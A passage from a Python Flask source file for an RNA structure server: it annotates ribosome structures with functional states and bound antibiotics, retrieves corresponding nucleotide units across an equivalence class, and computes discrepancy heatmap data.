'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (CA)'),\n ('4V52|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (AA & BB)'),\n ('4V52|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (CA & DB)'),\n ('4V53|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (AA & BB)'),\n ('4V53|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (CA & DB)'),\n ('4V54|1|BB', 'Empty', 'Ribosome recycling', 'RRF (B6)', '-'),\n ('4V54|1|DB', 'Empty', 'Ribosome recycling', 'RRF (D6)', '-'),\n ('4V55|1|BB', 'Empty', 'Ribosome recycling', 'RRF (B6)', 'Gentamycin (AA & BB)'),\n ('4V55|1|DB', 'Empty', 'Ribosome recycling', 'RRF (D6)', 'Gentamycin (CA & DB)'),\n ('4V56|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA)'),\n ('4V56|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA)'),\n ('4V57|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA) and Neomycin (AA & BB)'),\n ('4V57|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA) and Neomycin (CA & DB)'),\n ('4V64|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (AA)'),\n ('4V64|1|DB', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (CA)'),\n ('4V7S|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Telithromycin (BA)'),\n ('4V7S|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7T|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Chloramphenicol (BA)'),\n ('4V7T|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7U|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Erythromycin A (BA)'),\n ('4V7U|1|DA', 'Empty', 'NB', '-', '-'),\n ('4V7V|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Clindamycin'),\n ('4V7V|1|DA', 'Empty', 'NB', '-', '-'), ('4V9C|1|BA', 'P/P', 'NO', '-', 'neomycin (AA & BA)'),\n ('4V9C|1|DA', 'P/E', 'NO', 'RRF(CY)', 'neomycin (CA & DA)'), ('4WF1|1|BA', '-', 'NB', '-', '-'),\n ('4WF1|1|DA', '-', 'Bound to antibiotic', '-', 'Negamycin (CA)'),\n ('4WOI|1|BA', 'P/E', 'Bound to antibiotic', '-', 'Paromomycin (AA & BA)'),\n ('4WOI|1|CA', 'P/P', 'Bound to antibiotic', '-', 'Paromomycin (CA & DA)'),\n ('4WWW|1|RA', 'Empty', 'Bound to antibiotic', '-', 'CEM-101 (RA)'),\n ('4WWW|1|YA', 'Empty', 'NO', '-', '-'),\n ('5KCR|1|1A', 'P/P ', 'Bound to antibiotic', '-', 'Avilamycin C (1A)'),\n ('5KCS|1|1A', 'P/P ', 'Bound to antibiotic', 'TetM (1w)', 'Evernimycin (1A)'),\n ('3J9Y|1|A', 'P/P', 'NO', 'TetM (w)', '-'),\n ('3JCD|1|A', 'P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Post EF4) ', 'EF4 (x)', '-'), (\n '3JCE|1|A', 'A/4 (6), P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Pre EF4)',\n 'EF4 (x)',\n '-'),\n ('5AFI|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', 'Kirromycin (z)'),\n ('5UYK|1|01', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYL|1|01', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYM|1|01', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYN|1|01', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYP|1|01', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYQ|1|01', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5WDT|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WE4|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', '-'),\n ('5WE6|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WF0|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFK|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFS|1|A', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('3J9Z|1|LA', 'P/P (S6), E/E (S7)', 'Elongation - Translocation', 'EF-G (S1)', '-'),\n ('3JA1|1|LA', 'P/E (S2)', 'Elongation - Translocation', 'EF-G (S3)', '-'),\n ('3JCJ|1|A', 'P/I* ', 'Initiation', 'IF-2 (f)', '-'),\n ('6DNC|1|B', 'E/E (D), P/P (LA)', 'Premature Termination', 'RF1 (MA)', '-'),\n ('5NP6|1|Y', 'P/P (B)', 'Recoding - Bypassing', '-', '-'), (\n '6H4N|1|A', 'E/E (w)', 'Ribosome hibernation',\n 'Ribosome modulation factor (v), ribosome hibernation promoting factor (x)', '-'),\n ('5H5U|1|A', 'P/P (5)', 'Ribosome Rescue', 'ArfA (3), RF2 (4)', '-'),\n ('5MDV|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDW|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDY|1|1', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MGP|1|A', 'P/P (x)', 'Ribosome Rescue', 'ArfA (w), RF2 (z)', '-'),\n ('5U4I|1|A', 'P/P (x), E*/E (y)', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U4J|1|A', '?', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U9F|1|01', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('5U9G|1|01', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('6ENF|1|A', 'P/P (x)', 'Ribosome Rescue', '-', '-'),\n ('6ENJ|1|A', 'A/A (9), P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6ENU|1|A', 'P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6C4I|1|A', 'P/P (x), E*/E (y)', 'Ribosome rescue', 'ArfA (w), RF-2 (v)', '-'),\n ('3JBU|1|b', 'P/P (v)', 'Ribosome Stalling', 'SecM (z)', '-'), (\n '3JBV|1|b', 'A/P* (V), P/E intermediate (W)', 'Ribosome Stalling', 'SecM (z)',\n 'Chloroamphenicol (b)'),\n ('5JTE|1|BA', 'A/A (AW), P/P (AX), E/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'), (\n '5JU8|1|BA', 'P/P (AX), E*/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'),\n ('5NWY|1|N', 'P/P-VemP (M)', 'Ribosome Stalling', '-', 'VemP (s)'),\n ('5O2R|1|A', 'P/P (x)', 'Ribosome Stalling', 'RF-1 (v)', 'Apidaecin (z)'),\n ('5LZA|1|A', 'P/P (v)', 'SelB activation', '-', '-'),\n ('5LZD|1|A', 'A/SelB (y), P/P (v)', 'SelB activation', 'SelB (z)', '-'),\n ('5IQR|1|1', 'A/R (6), P/P (5), E/E (4)', 'Stringent Control', 'RelA (8)', 'Paromomycine (2)'),\n ('5KPS|1|28', 'P/P (31), E/E (32)', 'Stringent Control', 'RelA (A)', '-'),\n ('5KPW|1|27', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5KPX|1|27', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5L3P|1|A', 'A/R( y), P/P (x)', 'Stringent Control', 'RelA (z)', '-'),\n ('4V85|1|BA', '-', 'Termination', 'RF3 (AW)', 'Viomycin (AY)'),\n ('4V89|1|BA', '-', 'Termination', 'RF3 (AW)', '-'),\n ('4V6C|1|BA', '-', 'Translation - elongation', '-', '-'),\n ('4V6C|1|DA', '-', 'Translation - elongation', '-', '-'),\n ('4V6D|1|BA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'),\n ('4V6D|1|DA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'), (\n '4V6E|1|BA', 'A-site ASL fragment (AX), P-site ASL fragment (AV)', 'Translation - elongation',\n '-', '-'), (\n '4V6E|1|DA', 'A-site ASL fragment (CX), P-site ASL fragment (CV)', 'Translation - elongation',\n '-', '-'), ('3J7Z|1|A', 'Empty', 'Ribosome Stalling', 'ErmCL (a)', 'Erythromycin A (A)'),\n ('6GC0|1|A', 'Empty', 'Ribosome Assembly', '-', '-'),\n ('4UY8|1|A', 'Empty', 'Ribosome Stalling', 'TnaC (7)', '-'),\n ('6GC8|1|A', 'Empty', 'Ribosome Assembly', '-', '-'), ('4V80|1|BA', '?', '?', '?', '?'),\n ('4V80|1|DA', '?', '?', '?', '?'), ('6GBZ|1|A', 'Empty', 'Ribosome Assembly', '-', '-'),\n ('6C4H|1|A', 'P-site ', 'Termination', 'RF2 (v)', '-'),\n ('5GAE|1|A', '?', 'Co-translational protein targeting', '-', '-'), (\n '5GAD|1|A', 'ESRP (1)', 'Co-translational protein targeting',\n 'SRP protein (i), SRP receptor (l)',\n '-'), ('5GAH|1|A', 'ESRP (1)', 'Co-translational protein targeting', 'SRP protein (i)', '-'),\n ('5GAG|1|A', 'ESRP (1)', 'Co-translational protein targeting', 'SRP protein (i)', '-'),\n ('5LZE|1|A', '?', 'Pre-translocation SelB', '?', '?')]\n\n data = request.args['units']\n\n query_list = input_type(data)\n\n reject_list = ['5AFI|1|A', '5LZE|1|A', '4WRO|1|3L', '4WSD|1|1K', '4WSD|1|1L', '4WSD|1|3L', '4WT1|1|1K', '4WT1|1|1L', '4WT1|1|3K', '4WT1|1|3L', '4WZO|1|3K', '4WZO|1|3L', '4Y4P|1|1w']\n\n #######################################################################################################\n def getKey(item):\n return item[0]\n\n #######################################################################################################\n def get_chain_idx(query):\n\n range_selection = []\n for elem in query:\n range_selection.append(elem)\n\n chain_idx = []\n for sublist in query:\n units_query = UnitInfo.query.filter(UnitInfo.unit_id.in_(sublist))\n\n for rows in units_query:\n chain_idx.append(rows.chain_index)\n\n return chain_idx\n\n query_type = check_query(query_list)\n\n if query_type != 'loop_id':\n query_ife = '|'.join(query_list[0][0].split('|')[:3])\n query_pdb = query_list[0][0].split('|')[0]\n query_chain = query_list[0][0].split('|')[2]\n else:\n pass\n\n #######################################################################################################\n def get_sorted_units(units):\n unsorted_units = units.split(',')\n sorted_units = sorted(unsorted_units, key=lambda x: int(x.split('|')[4]))\n return sorted_units\n ########################################################################################################\n def check_insertion(corr_units):\n for unit in corr_units:\n ife_num = unit.split('|')[-1]\n try:\n num = int(ife_num)\n except ValueError:\n corr_units.remove(unit)\n\n return corr_units\n #########################################################################################################\n def custom_order(dct, spec):\n res = OrderedDict()\n for key in spec:\n if key in dct:\n res[key] = dct.pop(key)\n res.update(dct.items())\n\n return res\n #########################################################################################################\n def group_corr(corr_list):\n corr_list.sort()\n keyf = lambda x: '|'.join(x.split('|')[:3])\n corr_grouped = [list(items) for gr, items in groupby(corr_list, key=keyf)]\n\n return corr_grouped\n #########################################################################################################\n def order_num(corr_list):\n\n rej_sub = []\n for unit in corr_list:\n try:\n unit.sort(key=lambda x: int(x.split('|')[-1]))\n except ValueError:\n rej_sub.append(unit)\n corr_list.remove(unit)\n\n return corr_list\n ##########################################################################################################\n \n units_complete_list = []\n\n if query_type == 'single_range':\n\n chain_idx = get_chain_idx(query_list)\n chain_idx.sort()\n\n units_query = UnitInfo.query.filter_by(pdb_id=query_pdb, chain=query_chain). \\\n filter(UnitInfo.chain_index.between(chain_idx[0], chain_idx[1])) \\\n .order_by(UnitInfo.chain_index).all()\n\n for row in units_query:\n units_complete_list.append(row.unit_id)\n\n elif query_type == 'multiple_ranges':\n chain_idx = get_chain_idx(query_list)\n chain_idx.sort()\n partition_size = len(query_list)\n # Partition the list into a list of lists containing the start and end units of each range\n chain_idx = [chain_idx[i:i + 2] for i in range(0, len(chain_idx), 2)]\n\n for i in chain_idx:\n units_query = UnitInfo.query.filter_by(pdb_id=query_pdb, chain=query_chain). \\\n filter(UnitInfo.chain_index.between(i[0], i[1])) \\\n .order_by(UnitInfo.chain_index).all()\n for row in units_query:\n units_complete_list.append(row.unit_id)\n\n units_complete_list = list(OrderedDict.fromkeys(units_complete_list))\n\n elif query_type == 'units_str':\n\n for unit in query_list:\n units_complete_list.append(unit[0])\n\n # todo work to do\n elif query_type == 'loop_id':\n\n loop_id = query_list[0][0]\n units_query = LoopInfo.query.filter_by(loop_id=loop_id)\n\n for row in units_query:\n unsorted_units = row.unit_ids\n loop_position = row.loop_name\n\n units_complete_list = get_sorted_units(unsorted_units)\n query_ife = '|'.join(units_complete_list[0].split('|')[:3])\n query_pdb = units_complete_list[0].split('|')[0]\n\n ##########################################################################################################\n\n # This section of the code deals with getting the members of Equivalence Class from the query chain\n ife_list = NrChains.query.join(NrClasses, NrReleases) \\\n .filter(NrChains.ife_id == query_ife).filter(NrClasses.resolution == '4.0') \\\n .order_by(NrReleases.date.desc()).limit(1)\n for row in ife_list:\n class_id = row.nr_class_id\n\n ec_query = NrClasses.query.filter_by(nr_class_id=class_id)\n for row in ec_query:\n equivalence_class = row.name\n nr_release = row.nr_release_id\n\n members_query = NrChains.query.filter_by(nr_class_id=class_id)\n ife_members = []\n for row in members_query:\n ife_members.append(row.ife_id)\n\n # remove ifes that are joined (+)\n rejected_ife = []\n for i, v in enumerate(ife_members):\n if any(c in '+' for c in v):\n rejected_ife.append(ife_members[i])\n del ife_members[i]\n\n for elem in reject_list:\n for i, v in enumerate(ife_members):\n if elem == v:\n rejected_ife.append(ife_members[i])\n del ife_members[i]\n else:\n pass\n\n members_pdb = []\n members_chain = []\n\n for ife in ife_members:\n members_pdb.append(ife.split('|')[0])\n members_chain.append(ife.split('|')[-1])\n\n members_info = zip(members_pdb, members_chain)\n #######################################################################################################\n # query nts as a string\n query_nts = ', '.join(units_complete_list)\n\n query_complete_len = len(units_complete_list)\n #####################################################################################################\n\n # This section deals with getting the units of unmodified nucleotides\n '''\n standard_nts = ('A', 'C', 'G', 'U')\n\n units_std_list = []\n\n for unit in units_complete_list:\n k = unit.split('|')[-2]\n if k in standard_nts:\n units_std_list.append(unit)\n\n query_std_len = len(units_std_list)\n '''\n\n #####################################################################################################\n\n # This section of the code deals with getting the complete corresponding unit_ids\n ordering = case(\n {unit: index for index, unit in enumerate(units_complete_list)},\n value=UnitCorrespondence.unit_id_1\n )\n\n correspondence_complete = UnitCorrespondence.query.filter(UnitCorrespondence.unit_id_1.in_(units_complete_list)) \\\n .order_by(ordering) \\\n .filter(tuple_(UnitCorrespondence.pdb_id_2, UnitCorrespondence.chain_name_2) \\\n .in_(members_info))\n\n # result_complete = [[unit.unit_id_2 for unit in units] for unit_id_1, units in\n # itertools.groupby(correspondence_complete, lambda x: x.unit_id_1)]\n\n # corr_complete = zip(*result_complete)\n # Append the units of the query motif\n # corr_complete.append(units_complete_list)\n\n corr_units = []\n\n for row in correspondence_complete:\n corr_units.append(row.unit_id_2)\n\n corr_filtered = check_insertion(corr_units)\n corr_grouped = group_corr(corr_filtered)\n corr_grouped = [x for x in corr_grouped if len(x) == query_complete_len]\n corr_complete = order_num(corr_grouped)\n corr_complete.append(units_complete_list)\n corr_std = deepcopy(corr_complete)\n\n accepted_seq = ['A', 'C', 'G', 'U']\n mod_idx = []\n for elem1 in corr_complete:\n for elem2 in elem1:\n seq = elem2.split('|')[3]\n if seq not in accepted_seq:\n mod_idx.append(elem1.index(elem2))\n\n mod_unique = set(mod_idx)\n mod_idx = list(mod_unique)\n\n for elem1 in corr_std:\n for ele in sorted(mod_idx, reverse = True): \n del elem1[ele]\n\n query_std_len = len(corr_std[0])\n\n return json.dumps(corr_complete)\n\n '''\n\n # first_elem = []\n\n # for sublist in corr_ordered:\n # first_elem.append(sublist[0].split('|')[-1])\n\n # Create lists for residue type and number\n unit_list = []\n res_num = []\n res_type = []\n for units in corr_complete:\n unit_list.append(units[0])\n for unit in units:\n res_num.append(unit.split('|')[-1])\n res_type.append(unit.split('|')[-2])\n # ife = '|'.join(units[0].split('|')[:3])\n # unit_list.append(ife)\n\n res_num_list = [res_num[i:i + query_complete_len] for i in range(0, len(res_num), query_complete_len)]\n res_type_list = [res_type[i:i + query_complete_len] for i in range(0, len(res_type), query_complete_len)]\n # res_list = [res_num[i:i + query_complete_len] for i in xrange(0, len(res_num), query_complete_len)]\n\n residue_num_unordered = []\n for a in range(0, len(res_num_list)):\n residue_num_unordered.append([\"{}{}\".format(x, y) for x, y in zip(res_type_list[a], res_num_list[a])])\n\n # Create list of IFES\n ife_list = []\n for elem in unit_list:\n ife = '|'.join(elem.split('|')[:3])\n ife_list.append(ife)\n\n # Create list of coordinates as strings\n coord_unordered = []\n for x in corr_complete:\n x = ','.join(x)\n coord_unordered.append(x)\n\n # Create a dictionary of ifes with coordinate data\n ife_coord = dict(zip(ife_list, coord_unordered))\n\n # Create a dictionary of ifes with residue list\n ife_res = dict(zip(ife_list, residue_num_unordered))\n\n pdb_updated = []\n chain_updated = []\n\n for ife in ife_list:\n pdb_updated.append(ife.split('|')[0])\n chain_updated.append(ife.split('|')[-1])\n\n members_info_updated = zip(pdb_updated, chain_updated)\n ##################################################################################\n\n # Comment out\n # Get the list of corresponding unit-ids without modified nucleotides\n \n ordering = case(\n {unit: index for index, unit in enumerate(units_std_list)},\n value=UnitCorrespondence.unit_id_1\n )\n\n correspondence_std = UnitCorrespondence.query.filter(UnitCorrespondence.unit_id_1.in_(units_std_list)) \\\n .order_by(ordering) \\\n .filter(tuple_(UnitCorrespondence.pdb_id_2, UnitCorrespondence.chain_name_2) \\\n .in_(members_info_updated))\n\n corr_std_units = []\n for row in correspondence_std:\n corr_std_units.append(row.unit_id_2)\n\n corr_std_grouped = group_corr(corr_std_units)\n corr_std_grouped = [x for x in corr_std_grouped if len(x) == query_std_len]\n corr_std = order_num(corr_std_grouped)\n\n # Append the standard units of the query motif\n corr_std.append(units_std_list)\n \n\n ##################################################################################\n\n # Logic to get and display pairwise interactions from the database\n bps_comb = []\n for a in range(0, len(corr_complete)):\n bps_comb.append([(map(str, comb)) for comb in combinations(corr_complete[a], 2)])\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n for a in range(0, len(corr_complete)):\n bps_list = UnitPairInteractions.query.filter(\n tuple_(UnitPairInteractions.unit_id_1, UnitPairInteractions.unit_id_2) \\\n .in_(bps_comb[a]))\n\n for row in bps_list:\n unit1.append(row.unit_id_1)\n unit2.append(row.unit_id_2)\n bpair.append(row.f_lwbp)\n bstack.append(row.f_stacks)\n bphosphate.append(row.f_bphs)\n bribose.append(row.f_brbs)\n\n pairwise_info = zip(unit1, unit2, bpair, bstack, bphosphate, bribose)\n\n filtered_pw_info = []\n for elem in pairwise_info:\n a = list(filter(lambda a: a != None, elem))\n filtered_pw_info.append(a)\n\n # return json.dumps(filtered_pw_info)\n\n units_order = {}\n for idx, unit in enumerate(units_complete_list):\n unit = unit.split('|')[-1]\n units_order[unit] = idx + 1\n\n n1 = []\n n2 = []\n\n for n in filtered_pw_info:\n n_1 = n[0].split('|')[-1]\n n_2 = n[1].split('|')[-1]\n try:\n n1.append(int(n_1))\n n2.append(int(n_2))\n except:\n pass\n\n possible_pw = zip(n1, n2)\n unique_pw = list(set(possible_pw))\n pw_sorted = sorted(unique_pw, key=getKey)\n\n pw_info = {k: OrderedDict({t: '-' for t in pw_sorted}) for k in ife_list}\n\n for sub_lst in filtered_pw_info:\n k0, k1 = '|'.join(sub_lst[0].split('|')[:3]), '|'.join(sub_lst[1].split('|')[:3])\n if k0 == k1 and k0 in pw_info:\n try:\n sub_key = (int(sub_lst[0][sub_lst[0].rfind('|') + 1:]), int(sub_lst[1][sub_lst[1].rfind('|') + 1:]))\n pw_info[k0][sub_key] = sub_lst[2] if len(sub_lst) == 3 else ';'.join(sub_lst[2:])\n except:\n pass\n\n ######################################################################################\n\n # Get center and rotation data for calculating discrepancy\n\n # Create list to store the centers np array\n units_center = []\n units_num_center = []\n\n # This section of the code deals with the database query to get the centers data\n for units in corr_std:\n\n ordering = case(\n {id: index for index, id in enumerate(units)},\n value=UnitCenters.unit_id\n )\n\n centers_query = UnitCenters.query.filter(UnitCenters.unit_id.in_(units),\n UnitCenters.name == 'base').order_by(ordering)\n for row in centers_query:\n units_center.append(np.array([row.x, row.y, row.z]))\n units_num_center.append(row.unit_id)\n\n units_center_list = [units_center[i:i + query_std_len] for i in xrange(0, len(units_center), query_std_len)]\n\n # Create list to store the rotation np array\n units_rotation = []\n units_num_rotation = []\n\n # This section of the code deals with the database query to get the rotation data\n for units in corr_std:\n\n ordering = case(\n {id: index for index, id in enumerate(units)},\n value=UnitRotations.unit_id\n )\n\n rotation_query = UnitRotations.query.filter(UnitRotations.unit_id.in_(units)).order_by(ordering)\n\n for row in rotation_query:\n units_rotation.append(np.array([[row.cell_0_0, row.cell_0_1, row.cell_0_2],\n [row.cell_1_0, row.cell_1_1, row.cell_1_2],\n [row.cell_2_0, row.cell_2_1, row.cell_2_2]]))\n units_num_rotation.append(row.unit_id)\n\n units_rotation_list = [units_rotation[i:i + query_std_len] for i in xrange(0, len(units_rotation), query_std_len)]\n\n rotation_size = len(units_rotation_list)\n\n ####################################################################################\n\n # This section of the code deals with calculating the discrepancy for the corresponding instances\n distances = coll.defaultdict(lambda: coll.defaultdict(int))\n\n for a in range(0, len(ife_list)):\n for b in range(a + 1, len(ife_list)):\n disc = matrix_discrepancy(units_center_list[a], units_rotation_list[a], units_center_list[b],\n units_rotation_list[b])\n distances[ife_list[a]][ife_list[b]] = disc\n\n # Empty list to append pairs of IFE with NaN discrepancy\n ife_nan = []\n\n for k, v in distances.items():\n for a, b in v.items():\n if math.isnan(b):\n ife_nan.append((k, a))\n v[a] = -0.1\n\n dist = np.zeros((len(ife_list), len(ife_list)))\n for index1, member1 in enumerate(ife_list):\n curr = distances.get(member1, {})\n for index2, member2 in enumerate(ife_list):\n dist[index1, index2] = curr.get(member2, 0)\n\n dist = (dist + np.swapaxes(dist, 0, 1))\n\n # ordering, _, _ = orderWithPathLengthFromDistanceMatrix(dist, 10, scanForNan=True)\n disc_order = optimalLeafOrder(dist)\n\n new_ordering = []\n idx_ordering = []\n\n for idx, order in enumerate(disc_order):\n new_ordering.append(ife_list[order])\n idx_ordering.append(idx)\n\n ifes_ordered = zip(idx_ordering, new_ordering)\n\n coord_ordered = []\n # append the coordinates based on new ordering\n for index in ifes_ordered:\n for key, val in ife_coord.iteritems():\n if index[1] == key:\n coord_ordered.append(val)\n\n res_list_ordered = []\n for index in ifes_ordered:\n for key, val in ife_res.iteritems():\n if index[1] == key:\n res_list_ordered.append(val)\n\n #########################################################################################\n\n # Logic to order and build the heatmap data\n\n # function to get the discrepancy based on the new ordering\n def get(d, first, second):\n return d.get(second, {}).get(first, 0.0)\n\n index1 = []\n index2 = []\n ife1 = []\n ife2 = []\n\n for member1 in ifes_ordered:\n for member2 in ifes_ordered:\n index1.append(member1[0])\n ife1.append(member1[1])\n index2.append(member2[0])\n ife2.append(member2[1])\n\n ife_pairs = zip(ife1, ife2)\n\n disc_ordered = [get(distances, first, second) or get(distances, second, first) for first, second in ife_pairs]\n\n disc_formatted = []\n for disc in disc_ordered:\n disc = '%.4f' % disc\n disc_formatted.append(disc)\n\n a = np.array(disc_formatted)\n a = a.astype(np.float)\n p1 = np.percentile(a, 90)\n p2 = np.percentile(a, 95)\n p3 = np.percentile(a, 99)\n maxDisc = np.amax(a)\n\n \n # Need to comment out\n rows = zip(ife1, ife2, disc_formatted)\n\n with open('/Applications/mamp/htdocs/corr-server/Disc/SSU-J/' + loop_id + '_disc.csv', \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([\"ID1\", \"ID2\", \"Disc\"])\n for row in rows:\n writer.writerow(row)\n \n\n # return 'Max value for discrepancy is: {} and 95th percentile is {}'.format(maxDisc, p)\n\n heatmap_data = [\n {\"ife1\": ife1, \"ife1_index\": ife1_index, \"ife2\": ife2, \"ife2_index\": ife2_index, \"discrepancy\": discrepancy}\n for ife1, ife1_index, ife2, ife2_index, discrepancy in zip(ife1, index1, ife2, index2, disc_formatted)\n ]\n\n trna_occupancy = []\n functional_state = []\n factors_bound = []\n antibiotic_bound = []\n for order in ifes_ordered:\n for state in annotation:\n if order[1] == state[0]:\n trna_occupancy.append(state[1])\n functional_state.append(state[2])\n factors_bound.append(state[3])\n antibiotic_bound.append(state[4])\n\n new_order = []\n for elem in ifes_ordered:\n new_order.append(elem[1])\n\n pw_info_ordered = custom_order(pw_info, new_order)\n\n ###########################################################################################\n return render_template(\"correspondence_display.html\", query_pdb=query_pdb, query_nts=query_nts,\n coord=coord_ordered, ifes=ifes_ordered, maxDisc=maxDisc, p1=p1, p2=p2, p3=p3,\n # loop_position=loop_position,\n ec=equivalence_class, release=nr_release, residue_info=res_list_ordered, data=heatmap_data,\n trna_occupancy=trna_occupancy, functional_state=functional_state,\n factors_bound=factors_bound,\n antibiotic_bound=antibiotic_bound, pw_info=pw_info_ordered, pw_list=pw_sorted)\n\n\n@app.route('/bridges')\ndef bridges():\n\n def getKey(item):\n return item[0]\n\n ife_collection = [\"3J9Y|1|a\", \"3J9Z|1|SA\", \"3JA1|1|SA\", \"3JBU|1|A\", \"3JBV|1|A\", \"3JCD|1|a\", \"3JCE|1|a\", \"3JCJ|1|g\",\n \"4U1U|1|AA\", \"4U1U|1|CA\", \"4U1V|1|AA\", \"4U1V|1|CA\", \"4U20|1|AA\",\n \"4U20|1|CA\", \"4U24|1|AA\", \"4U24|1|CA\", \"4U25|1|AA\", \"4U25|1|CA\", \"4U26|1|AA\", \"4U26|1|CA\",\n \"4U27|1|AA\", \"4U27|1|CA\", \"4V4H|1|AA\", \"4V4H|1|CA\", \"4V4Q|1|AA\", \"4V4Q|1|CA\", \"4V50|1|AA\",\n \"4V50|1|CA\", \"4V52|1|AA\", \"4V52|1|CA\", \"4V53|1|AA\", \"4V53|1|CA\", \"4V54|1|AA\", \"4V54|1|CA\",\n \"4V55|1|AA\", \"4V55|1|CA\", \"4V56|1|AA\", \"4V56|1|CA\", \"4V57|1|AA\", \"4V57|1|CA\", \"4V5B|1|BA\",\n \"4V5B|1|DA\", \"4V64|1|AA\", \"4V64|1|CA\", \"4V6C|1|AA\", \"4V6C|1|CA\", \"4V6D|1|AA\", \"4V6D|1|CA\",\n \"4V6E|1|AA\", \"4V6E|1|CA\", \"4V7S|1|AA\", \"4V7S|1|CA\", \"4V7T|1|AA\", \"4V7T|1|CA\", \"4V7U|1|AA\",\n \"4V7U|1|CA\", \"4V7V|1|AA\", \"4V7V|1|CA\", \"4V85|1|AA\", \"4V89|1|AA\",\n \"4V9C|1|AA\", \"4V9C|1|CA\", \"4V9D|1|AA\", \"4V9D|1|BA\", \"4V9O|1|BA\", \"4V9O|1|DA\", \"4V9O|1|FA\",\n \"4V9O|1|HA\", \"4V9P|1|BA\", \"4V9P|1|DA\", \"4V9P|1|FA\", \"4V9P|1|HA\", \"4WF1|1|AA\", \"4WF1|1|CA\",\n \"4WOI|1|AA\", \"4WOI|1|DA\", \"4WWW|1|QA\", \"4WWW|1|XA\", \"4YBB|1|AA\", \"4YBB|1|BA\", \"5H5U|1|h\",\n \"5IQR|1|2\", \"5IT8|1|AA\", \"5IT8|1|BA\", \"5J5B|1|AA\", \"5J5B|1|BA\", \"5J7L|1|BA\", \"5J88|1|AA\",\n \"5J88|1|BA\", \"5J8A|1|AA\", \"5J8A|1|BA\", \"5J91|1|AA\", \"5J91|1|BA\", \"5JC9|1|AA\", \"5JC9|1|BA\",\n \"5JTE|1|AA\", \"5JU8|1|AA\", \"5KCR|1|1a\", \"5KCS|1|1a\", \"5KPS|1|27\", \"5KPW|1|26\", \"5KPX|1|26\",\n \"5L3P|1|a\", \"5MDV|1|2\", \"5MDW|1|2\", \"5MDY|1|2\", \"5MDZ|1|2\", \"5MGP|1|a\", \"5NP6|1|D\", \"5NWY|1|0\",\n \"5O2R|1|a\", \"5U4I|1|a\", \"5U4J|1|a\", \"5U9F|1|A\", \"5U9G|1|A\", \"5UYK|1|A\", \"5UYL|1|A\", \"5UYM|1|A\",\n \"5UYN|1|A\", \"5UYP|1|A\", \"5UYQ|1|A\", \"5WDT|1|a\", \"5WE4|1|a\", \"5WE6|1|a\", \"5WF0|1|a\", \"5WFS|1|a\",\n \"6BU8|1|A\", \"6C4I|1|a\", \"6DNC|1|A\", \"6ENF|1|a\", \"6ENJ|1|a\", \"6ENU|1|a\", \"5J7L|1|AA\"]\n\n unit1 = []\n unit2 = []\n bpair = []\n bstack = []\n bphosphate = []\n bribose = []\n 